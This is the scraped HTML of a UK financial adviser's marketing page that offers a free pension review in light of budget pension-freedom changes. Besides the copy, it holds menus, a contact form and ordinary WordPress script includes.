Trust</a></li>&#13;\n	<li id=\"menu-item-114\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-114 fusion-dropdown-submenu\"><a href=\"/discretionary-trusts\">Discretionary Trusts</a></li>&#13;\n	<li id=\"menu-item-115\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-115 fusion-dropdown-submenu\"><a href=\"/absolute-trusts\">Absolute Trusts</a></li>&#13;\n	<li id=\"menu-item-143\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-143 fusion-dropdown-submenu\"><a href=\"/gift-loan-schemes\">Gift &amp; Loan Trust</a></li>&#13;\n	<li id=\"menu-item-146\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-146 fusion-dropdown-submenu\"><a href=\"/wills-and-trust\">Wills and Trust</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-3381\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3381 fusion-dropdown-menu\"><a href=\"/insurance-protection\">Insurance</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-3535\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3535 fusion-dropdown-submenu\"><a href=\"/critical-illness-insurance-2-0\">Critical Illness</a></li>&#13;\n	<li id=\"menu-item-3585\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-3585 fusion-dropdown-submenu\"><a href=\"/serious-illness-cover\">Serious Illness</a></li>&#13;\n	<li id=\"menu-item-4633\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-4633 fusion-dropdown-submenu\"><a href=\"/relevant-life-plan\">Relevant Life Plan</a></li>&#13;\n	<li id=\"menu-item-7228\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7228 fusion-dropdown-submenu\"><a href=\"/life-insurance\">Life Insurance</a></li>&#13;\n	<li id=\"menu-item-7243\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7243 fusion-dropdown-submenu\"><a href=\"/business-protection-insurance\">Business Protection</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7672\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7672 fusion-dropdown-menu\"><a href=\"/about-us\">About</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7676\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7676 fusion-dropdown-submenu\"><a href=\"/our-team\">Our Team</a></li>&#13;\n	<li id=\"menu-item-7677\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7677 fusion-dropdown-submenu\"><a href=\"/about-us/testimonials\">Testimonials</a></li>&#13;\n	<li id=\"menu-item-7673\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-7673 fusion-dropdown-submenu\"><a href=\"https://rsr.wrapadviser.co.uk/home.aspx?logout=1\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-menu\',\'http://rsr.wrapadviser.co.uk\']);\">Login</a></li>&#13;\n	<li id=\"menu-item-7680\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7680 fusion-dropdown-submenu\"><a href=\"/terms-of-use\">Terms Of Use</a></li>&#13;\n	<li id=\"menu-item-7681\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7681 fusion-dropdown-submenu\"><a href=\"/privacy-policy\">Privacy Policy</a></li>&#13;\n	<li id=\"menu-item-7682\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7682 fusion-dropdown-submenu\"><a href=\"/cookies\">Cookies</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7674\" class=\"menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-7674 fusion-dropdown-menu\"><a href=\"/our-blog\">Blog</a>&#13;\n<ul class=\"sub-menu\"><li id=\"menu-item-7678\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7678 fusion-dropdown-submenu\"><a href=\"/resources\">Resources</a></li>&#13;\n</ul></li>&#13;\n<li id=\"menu-item-7675\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7675\"><a href=\"/contact-us\">Contact</a></li>&#13;\n		</ul></nav><div class=\"mobile-nav-holder main-menu\"/>&#13;\n					</div>&#13;\n	</div>&#13;\n</div>		<div class=\"init-sticky-header\"/>&#13;\n		</div>&#13;\n						<div id=\"sliders-container\">&#13;\n									</div>&#13;\n		&#13;\n																<div id=\"main\" class=\"clearfix \" style=\"\">&#13;\n		<div class=\"avada-row\" style=\"\">&#13;\n			<div id=\"content\" style=\"float:left;\">&#13;\n				<div id=\"post-5919\" class=\"post-5919 page type-page status-publish hentry\">&#13;\n			<span class=\"entry-title\" style=\"display: none;\">Pension Review</span>&#13;\n			<span class=\"vcard\" style=\"display: none;\"><span class=\"fn\"><a href=\"/author/rs-r-admin\" title=\"Posts by Equity SMART\" rel=\"author\">Equity SMART</a></span></span>&#13;\n			<span class=\"updated\" style=\"display: none;\">2017-07-11T13:33:26+00:00</span>&#13;\n																								<div class=\"post-content\">&#13;\n				<div class=\"wpb_row vc_row-fluid\">&#13;\n	<div class=\"vc_span12 wpb_column column_container\">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			&#13;\n	<div class=\"wpb_text_column wpb_content_element \">&#13;\n		<div class=\"wpb_wrapper\">&#13;\n			<p style=\"text-align: center;\"><span style=\"font-size: xx-large;\">Do You Know The Value of Your Pension?</span></p>&#13;\n<h2 style=\"text-align: center;\">Budget 2017 : No Need to Buy an Annuity When You Retire. Find Out if Your Pension Can Make the Most From The Proposed Changes With a Free, Helpful Independent  Pension Review</h2>&#13;\n<p/><div class=\"clearboth\"/><div class=\"demo-sep sep-none\" style=\"margin-top:20px;\"/>&#13;\n<p><a href=\"#\"/></p>&#13;\n<h2 style=\"text-align: center;\"/>&#13;\n<h3 style=\"text-align: center;\"><span style=\"font-size: 14px; line-height: 1.5em;\"><div class=\"clearboth\"/><div class=\"demo-sep sep-single\" style=\"margin-top:20px;margin-bottom:20px;\"/></span>&#13;\n<h2>Private pensions just got better for everyone</h2>&#13;\n</h3><p>The Chancellor has finished speaking. The pundits have had their say. The politicians have argued. But one thing is undeniable about the 2017 Budget. If you have a private pension, it’s great news for you.</p>&#13;\n<p>Assuming the Chancellor’s proposals are accepted – and there’s no reason to suppose they won’t be – you are going to have much more control over your pensions from April 2015.</p>&#13;\n<p>Pensions will become much more flexible and will allow you to take the money you want when you want it. No more being forced into taking an annuity – you can really make your pension work in the way you want it to work.</p>&#13;\n<p>So the proposed changes are great news – but they’re also a potential minefield.</p>&#13;\n<p>The Chancellor’s proposals are exactly what we’ve been advocating – but we know that greater freedom and flexibility mean that clients will need more, not less advice. There are now far more options when you retire.</p>&#13;\n<p>With this new found pension freedom a lot of people are going to face a lot of choices – and without proper expert advice a lot of the decisions they make  may be wrong.</p>&#13;\n<p>If the budget announcement has put your pension at the forefront of you mind, why not review yours now</p>&#13;\n<h3 style=\"text-align: left;\">We’re experienced, we’re independent – and we’ll make sure that your pension really works for you.&#13;\n</h3><p/>&#13;\n<p/><div class=\"clearboth\"/><div class=\"demo-sep sep-none\" style=\"margin-top:20px;\"/>&#13;\n<h2 style=\"text-align: center;\"><b>Get Your Free Pension Review Today</b></h2>&#13;\n<p style=\"font-weight: normal; text-align: center;\"><big><big>Call FREE on  or click the link below to find out more</big></big></p>&#13;\n<p style=\"text-align: center;\"><a href=\"https://my.leadpages.net/leadbox/144ee6073f72a2%3A125d9572eb46dc/5675941284020224/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-article\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"/WW6C26j4cw7fcjW8TxY2AaIBRfrqE5KXe8nhn_0IXqivsdPANvMa8CmzzMVnK5RIYwXqO7AE3OQ2zG_LmE_U07k_s0.jpg\" alt=\"\"/></a><script src=\"/leadbox-690.js\"/>  </p>&#13;\n<p><span style=\"font-size: 14px; line-height: 1.5em;\"><div class=\"clearboth\"/><div class=\"demo-sep sep-double\" style=\"margin-top:20px;margin-bottom:20px;\"/></span></p>&#13;\n<div class=\"one_half\">&#13;\n<p><b>Why Take Action to Review Your Pension</b></p>&#13;\n<style type=\"text/css\"><![CDATA[\r\n	#checklist-1 li:before{color:#81d742 !important; content:\'f005\' }\r\n	]]></style><ul id=\"checklist-1\" class=\"list-icon circle-yes list-icon-star\"><li>find out exactly how your pension is performing.</li>&#13;\n<li>get your current fund size and projected values to your retirement.</li>&#13;\n<li>what your dependents can expect to receive</li>&#13;\n<li>the investment returns needed to meet your goals.</li>&#13;\n<li>the impact of charges on your pension pot.</li>&#13;\n<li>help you track down missing or lost pensions.</li>&#13;\n<li>ensure your pension is tax efficient.</li>&#13;\n</ul><p>    &#13;\n</p><p/><div class=\"clearboth\"/><div class=\"demo-sep sep-none\" style=\"margin-top:20px;\"/>&#13;\n<p><span style=\"line-height: 1.5em;\"/></p></div><div class=\"one_half last\"> &#13;\n<p>We Help You Make the Right Choices</p>&#13;\n<p><span style=\"font-size: 14px; line-height: 1.5em;\"><style type=\"text/css\"><![CDATA[\r\n	#checklist-2 li:before{color:#ffffff !important; content:\'f046\' }\r\n	]]></style></span></p>&#13;\n<ul id=\"checklist-2\" class=\"list-icon circle-yes or no list-icon-check\"><li>&#13;\n<p>More Choice &amp; Clarity Our pension review is independent, impartial and jargon free, with no hidden fees or costs.</p>&#13;\n</li>&#13;\n<li>&#13;\n<p>Better Insights Our experience and knowledge will assist you when considering all your options, including the multiple alternatives that are available to you.</p>&#13;\n</li>&#13;\n<li>&#13;\n<p>Working Together Pension planning is not a short term transaction, we’re here for the long term, providing advice and guidance regularly on your remaining pension pot, checking in to ensure everything remains on track.</p>&#13;\n</li>&#13;\n</ul><p>     </p></div><div class=\"clearboth\"/> <div class=\"title\"><p>Kind Words &amp; Praise</p><div class=\"title-sep-container\"><div class=\"title-sep\"/></div></div>    <div class=\"clearboth\"/><div class=\"demo-sep sep-double\" style=\"margin-top:10px;margin-bottom:10px;\"/> <div class=\"clearboth\"/><div class=\"demo-sep sep-none\" style=\"margin-top:10px;\"/>   &#13;\n<h2 style=\"text-align: center;\"><b>Find Out If You Can Improve Your Pension Choices</b></h2>&#13;\n<p>  <big><big>Call FREE on  or click the link below to find out more</big></big></p>&#13;\n<p>  <a href=\"https://my.leadpages.net/leadbox/144ee6073f72a2%3A125d9572eb46dc/5675941284020224/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-article\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img class=\"aligncenter\" src=\"/WW6C26j4cw7fcjW8TxY2AaIBRfrqE5KXe8nhn_0IXqivsdPANvMa8CmzzMVnK5RIYwXqO7AE3OQ2zG_LmE_U07k_s0.jpg\" alt=\"\"/></a><script src=\"/leadbox-690.js\"/></p>&#13;\n<p/>&#13;\n<p/><div class=\"clearboth\"/><div class=\"demo-sep sep-none\" style=\"margin-top:20px;\"/>&#13;\n<p> </p>&#13;\n<p><big>We Compare The Whole Pension Market</big></p>&#13;\n<div class=\"images-carousel-container related-posts related-projects \"><div id=\"carousel\" class=\"clients-carousel es-carousel-wrapper\"><div class=\"es-carousel\"><ul><li><a href=\"/wp-content/uploads/2013/05/axa.jpg\" target=\"\" title=\"\"><img src=\"/wp-content/uploads/2013/05/axa.jpg\" alt=\"axa\"/></a></li><li><a href=\"/wp-content/uploads/2013/05/aegon.jpg\" target=\"\" title=\"\"><img src=\"/wp-content/uploads/2013/05/aegon.jpg\" alt=\"\"/></a></li><li><a href=\"/wp-content/uploads/2013/05/aviva.jpg\" target=\"\" title=\"\"><img src=\"/wp-content/uploads/2013/05/aviva.jpg\" alt=\"\"/></a></li><li><a href=\"/wp-content/uploads/2013/05/friendslife.jpg\" target=\"\" title=\"\"><img src=\"/wp-content/uploads/2013/05/friendslife.jpg\" alt=\"\"/></a></li><li><a href=\"/wp-content/uploads/2013/05/Standard_Life_logo1.png\" target=\"\" title=\"\"><img src=\"/wp-content/uploads/2013/05/Standard_Life_logo1.png\" alt=\"\"/></a></li><li><a href=\"/wp-content/uploads/2013/05/legal-and-general.gif\" target=\"\" title=\"\"><img src=\"/wp-content/uploads/2013/05/legal-and-general.gif\" alt=\"\"/></a></li><li><a href=\"/wp-content/uploads/2013/05/prudential.jpg\" target=\"\" title=\"\"><img src=\"/wp-content/uploads/2013/05/prudential.jpg\" alt=\"\"/></a></li></ul><div class=\"es-nav\"><span class=\"es-nav-prev\">Previous</span><span class=\"es-nav-next\">Next</span></div></div></div></div><br/><div class=\"clearboth\"/><div class=\"demo-sep sep-double\" style=\"margin-top:20px;margin-bottom:20px;\"/>&#13;\n<h2><b>More Benefits To Have Your Pension Reviewed With Equity SMART<br/></b><b><br/></b></h2>&#13;\n<p><b>We will review your current pension and options at no initial cost</b><b><br/></b>We will provide a review of your current circumstances and goals for retirement. If you have pensions currently in place then we will analyse past performance and the projected income forecast. We will explain how your pension works including dependents benefits, charges and any special scheme rules. We will also offer recommendations if we feel that anything can be improved upon</p>&#13;\n<p><b>Decades of experience with our leading qualified advisers – people who genuinely care </b><br/>&#13;\nWhether you’re just starting out in your career, already retired or somewhere in between, we help you by providing you access to the best pension management advice and all the services and benefits you will need from one of the UK’s leading and most respected independent financial advisory firms.</p>&#13;\n<p><b>We cover all types of pensions – saving you time &amp; money</b><br/>&#13;\nPension improvement – <a href=\"/pensions/pension-transfer\" target=\"_blank\">transferring a pension</a> – pension release – SIPPS – Annuities – Income Drawdown<b>, </b>you can be sure that we have the right people and the right products – tailored specifically to you and your needs. We’re flexible and can adapt our service to suit your situation – something which is so important yet rare in today’s ever more complicated pension market.</p>&#13;\n<p><b>The widest range of appointment times to fit your busy schedule</b><br/>&#13;\nWe’ll work to protect, enhance and develop your assets both now and in the future through careful planning and review – So get in touch and let’s discuss your Pension Review. We have a wide range of appointment times to fit your busy schedule – We’ll even call you in the evening if that’s what you require – it’s really not a problem just let us know when suits you best.</p>&#13;\n<p><b>Big Company – Local Touch</b><br/>&#13;\nWe won’t keep you on hold when you call or pass you around. You’re a person and everyone at Equity SMART will treat you as such and ensure that they get to know you and what you need.</p>&#13;\n<p/>&#13;\n<p/><div class=\"clearboth\"/><div class=\"demo-sep sep-none\" style=\"margin-top:20px;\"/>&#13;\n<h2 style=\"text-align: center;\"><b>Find Out If You Can Improve Your Pension</b></h2>&#13;\n<p style=\"text-align: center;\"><big><big>Call FREE on  or click the link below to find out more</big></big></p>&#13;\n<p style=\"text-align: center;\"><a href=\"https://my.leadpages.net/leadbox/144ee6073f72a2%3A125d9572eb46dc/5675941284020224/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-article\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"/WW6C26j4cw7fcjW8TxY2AaIBRfrqE5KXe8nhn_0IXqivsdPANvMa8CmzzMVnK5RIYwXqO7AE3OQ2zG_LmE_U07k_s0.jpg\" alt=\"\"/></a><script src=\"/leadbox-690.js\"/></p>&#13;\n<p> </p>&#13;\n<p> </p>&#13;\n&#13;\n		</div> &#13;\n	</div> &#13;\n		</div> &#13;\n	</div> &#13;\n</div>&#13;\n							</div>&#13;\n																	</div>&#13;\n			</div>&#13;\n		<div id=\"sidebar\" style=\"float:right;\"><div id=\"nav_menu-2\" class=\"widget widget_nav_menu\"><div class=\"heading\"><p>In This Section</p></div><div class=\"menu-pensions-sidebar-container\"><ul id=\"menu-pensions-sidebar\" class=\"menu\"><li id=\"menu-item-7650\" class=\"menu-item menu-item-type-post_type menu-item-object-page current-page-ancestor menu-item-7650\"><a href=\"/pensions\">Pensions</a></li>&#13;\n<li id=\"menu-item-7651\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7651\"><a href=\"/pensions/pension-transfer\">Pension Transfer</a></li>&#13;\n<li id=\"menu-item-7652\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7652\"><a href=\"/pensions/pension-release\">Pension Release</a></li>&#13;\n<li id=\"menu-item-7646\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7646\"><a href=\"/pensions/personal-pensions\">Personal Pensions</a></li>&#13;\n<li id=\"menu-item-7647\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7647\"><a href=\"/pensions/auto-enrolment-pensions\">Auto Enrolment Pensions</a></li>&#13;\n<li id=\"menu-item-7648\" class=\"menu-item menu-item-type-post_type menu-item-object-page menu-item-7648\"><a href=\"/pensions/occupational-pensions\">Occupational Pensions</a></li>&#13;\n</ul></div></div><div id=\"text-17\" class=\"widget widget_text\">			<div class=\"textwidget\"><div class=\"clearboth\"/><div class=\"demo-sep sep-double\" style=\"margin-top:25px;margin-bottom:25px;\"/>&#13;\n&#13;\n<center><span style=\"color: #afd9a5;\"><big><big><big><big><b>Call Us Free<br/><br/></b></big></big></big></big></span></center>&#13;\n&#13;\n<div class=\"clearboth\"/><div class=\"demo-sep sep-double\" style=\"margin-top:25px;margin-bottom:25px;\"/>&#13;\n&#13;\n<big><big><big><b>Enquire Now</b></big></big></big>&#13;\n<br/>Fill in our short form and see what we can do for your pension. &#13;\n&#13;\n&#13;\n                <div class=\"gf_browser_unknown gform_wrapper\" id=\"gform_wrapper_7\"><form method=\"post\" enctype=\"multipart/form-data\" id=\"gform_7\" action=\"../../pensions/pension-review/\">&#13;\n                        <div class=\"gform_body\">&#13;\n                            <ul id=\"gform_fields_7\" class=\"gform_fields top_label description_above\"><li id=\"field_7_1\" class=\"gfield               gfield_contains_required\"><label class=\"gfield_label\" for=\"input_7_1\">Name<span class=\"gfield_required\">*</span></label><div class=\"ginput_container\"><input name=\"input_1\" id=\"input_7_1\" type=\"text\" value=\"\" class=\"large\" tabindex=\"1\"/></div></li><li id=\"field_7_13\" class=\"gfield\"><label class=\"gfield_label\" for=\"input_7_13\">Email Address</label><div class=\"ginput_container\"><input name=\"input_13\" id=\"input_7_13\" type=\"text\" value=\"\" class=\"large\" tabindex=\"2\"/></div></li><li id=\"field_7_10\" class=\"gfield               gfield_contains_required\"><label class=\"gfield_label\" for=\"input_7_10\">Phone Number<span class=\"gfield_required\">*</span></label><div class=\"ginput_container\"><input name=\"input_10\" id=\"input_7_10\" type=\"text\" value=\"\" class=\"large\" tabindex=\"3\"/></div></li><li id=\"field_7_12\" class=\"gfield\"><label class=\"gfield_label\" for=\"input_7_12\">Your Message</label><div class=\"ginput_container\"><textarea name=\"input_12\" id=\"input_7_12\" class=\"textarea small\" tabindex=\"4\" rows=\"10\" cols=\"50\"/></div></li><li id=\"field_7_14\" class=\"gfield    gform_validation_container\"><label class=\"gfield_label\" for=\"input_7_14\">Phone</label><div class=\"ginput_container\"><input name=\"input_14\" id=\"input_7_14\" type=\"text\" value=\"\" autocomplete=\"off\"/></div><div class=\"gfield_description\">This field is for validation purposes and should be left unchanged.</div></li>&#13;\n                            </ul></div>&#13;\n        <div class=\"gform_footer top_label\"> <input type=\"submit\" id=\"gform_submit_button_7\" class=\"button gform_button\" value=\"Get Advice\" tabindex=\"5\" onclick=\"if(window[&quot;gf_submitting_7&quot;]){return false;}  if( !jQuery(&quot;#gform_7&quot;)[0].checkValidity || jQuery(&quot;#gform_7&quot;)[0].checkValidity()){window[&quot;gf_submitting_7&quot;]=true;} \"/><input type=\"hidden\" class=\"gform_hidden\" name=\"is_submit_7\" value=\"1\"/><input type=\"hidden\" class=\"gform_hidden\" name=\"gform_submit\" value=\"7\"/><input type=\"hidden\" class=\"gform_hidden\" name=\"gform_unique_id\" value=\"\"/><input type=\"hidden\" class=\"gform_hidden\" name=\"state_7\" value=\"WyJbXSIsImYwNzdlZDA5OWZkMWFjZWE3NjE0YTE2ZTZkNTA0MzM5Il0=\"/><input type=\"hidden\" class=\"gform_hidden\" name=\"gform_target_page_number_7\" id=\"gform_target_page_number_7\" value=\"0\"/><input type=\"hidden\" class=\"gform_hidden\" name=\"gform_source_page_number_7\" id=\"gform_source_page_number_7\" value=\"1\"/><input type=\"hidden\" name=\"gform_field_values\" value=\"\"/></div>&#13;\n                        &#13;\n                        </form></div><script type=\"text/javascript\"><![CDATA[ jQuery(document).ready(function(){jQuery(document).trigger(\'gform_post_render\', [7, 1]) } ); ]]></script><div class=\"clearboth\"/><div class=\"demo-sep sep-double\" style=\"margin-top:25px;margin-bottom:25px;\"/></div>&#13;\n		</div><div id=\"text-18\" class=\"widget widget_text\">			<div class=\"textwidget\"><div class=\"accordian\">&#13;\n<h5 class=\"toggle \"><a href=\"#\"><span class=\"arrow\"/>About Equity SMART</a></h5><div class=\"toggle-content \" style=\"display: none;\">Equity SMART is an independently owned Financial Planning firm dedicated to the provision of personal, professional and objective driven advice, that allows our clients live more fulfilled and happier lives.</div>&#13;\n<h5 class=\"toggle \"><a href=\"#\"><span class=\"arrow\"/>Our Promise To You...</a></h5><div class=\"toggle-content \" style=\"display: none;\">We stand for honesty – advice – trust and value.  Our culture and people matter regarding what you can expect from us. We promise you this the team that makes Equity SMART work will be centred on you. We believe in treating clients like family, so you can be confident that we’ll give you the same advice we would give to our own relatives.</div>&#13;\n<h5 class=\"toggle \"><a href=\"#\"><span class=\"arrow\"/>Contact Us Today</a></h5><div class=\"toggle-content \" style=\"display: none;\">It’s all so simple.  Book a chat with one our independent financial advisors. It\'s free, without obligation and impartial click the link or call free on .</div>&#13;\n</div></div>&#13;\n		</div></div>&#13;\n		</div>&#13;\n	</div>&#13;\n				<footer class=\"footer-area\"><div class=\"avada-row\">&#13;\n			<section class=\"columns columns-4\"><article class=\"col\"><div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\">		<p>Our Latest Posts</p>		<ul><li>&#13;\n				<a href=\"/new-individual-savings-accounts\">The New Individual Savings Accounts</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/get-auto-enrolment\">How To Get The Most From Auto-Enrolment</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/may-2014-stock-market-bulletin\">May 2017 Stock Market Bulletin</a>&#13;\n						</li>&#13;\n					<li>&#13;\n				<a href=\"/bank-left-stranded-without-financial-adviser\">Has Your Bank Left You Stranded Without a Financial Adviser</a>&#13;\n						</li>&#13;\n				</ul><div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-13\" class=\"footer-widget-col widget_text\"><p>Equity SMART</p>			<div class=\"textwidget\"><p>Established for over 20 years we work with individuals, families and owner managed businesses countrywide, helping them organise; plan; protect and achieve the future they choose, through \"hands on\" objective and realistic financial advice they can depend on.</p>&#13;\n</div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col\"><div id=\"text-22\" class=\"footer-widget-col widget_text\"><p>Download FREE Guides</p>			<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/1435eb973f72a2%3A125d9572eb46dc/5753952654065664/\" onclick=\"javascript:_gaq.push([\'_trackEvent\',\'outbound-widget\',\'http://my.leadpages.net\']);\" target=\"_blank\"><img src=\"/w3QPpbD3DJXcyqPrBaexcUOnTpQKlOX0XuzNYejlD3Hwl1wrM5qbyjoyp4eUJt-wEdlJsAojFjru39Y0ZjrDnA_s0.jpg\"/></a><script type=\"text/javascript\" src=\"/leadbox-689.js\"/></div>&#13;\n		<div style=\"clear:both;\"/></div>				</article><article class=\"col last\"><div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>Contact Info</p>		<div class=\"contact-info-container\">&#13;\n				<p class=\"address\">Manchester &amp; London</p>&#13;\n		&#13;\n				<p class=\"phone\">Phone: </p>&#13;\n		&#13;\n		&#13;\n		&#13;\n				<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>&#13;\n		&#13;\n				&#13;\n				</div>&#13;\n		<div style=\"clear:both;\"/></div><div id=\"social_links-widget-3\" class=\"footer-widget-col social_links\"><p>Connect With Us</p>		<ul class=\"social-networks  clearfix\"><li class=\"rss\">&#13;\n				<a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"\">RSS</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>RSS</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n												<li class=\"twitter\">&#13;\n				<a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"\">Twitter</a>&#13;\n				<div class=\"popup\">&#13;\n					<div class=\"holder\">&#13;\n						<p>Twitter</p>&#13;\n					</div>&#13;\n				</div>&#13;\n			</li>&#13;\n																																																								</ul><div style=\"clear:both;\"/></div>				</article></section></div>&#13;\n	</footer><footer id=\"footer\"><div class=\"avada-row\"/>&#13;\n	</footer></div><!-- wrapper -->&#13;\n	&#13;\n	<script type=\"text/javascript\" src=\"/maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><link rel=\"stylesheet\" id=\"js_composer_front-css\" href=\"/wp-content/plugins/js_composer/assets/css/js_composer_front.css\" type=\"text/css\" media=\"all\"/><link rel=\"stylesheet\" id=\"gforms_reset_css-css\" href=\"http://www.equalitywalk.org.uk/wp-content/plugins/gravityforms/css/formreset.css?ver=1.8.7\" type=\"text/css\" media=\"all\"/><link rel=\"stylesheet\" id=\"gforms_formsmain_css-css\" href=\"http://www.equalitywalk.org.uk/wp-content/plugins/gravityforms/css/formsmain.css?ver=1.8.7\" type=\"text/css\" media=\"all\"/><link rel=\"stylesheet\" id=\"gforms_ready_class_css-css\" href=\"http://www.equalitywalk.org.uk/wp-content/plugins/gravityforms/css/readyclass.css?ver=1.8.7\" type=\"text/css\" media=\"all\"/><link rel=\"stylesheet\" id=\"gforms_browsers_css-css\" href=\"http://www.equalitywalk.org.uk/wp-content/plugins/gravityforms/css/browsers.css?ver=1.8.7\" type=\"text/css\" media=\"all\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"/wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"/wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio 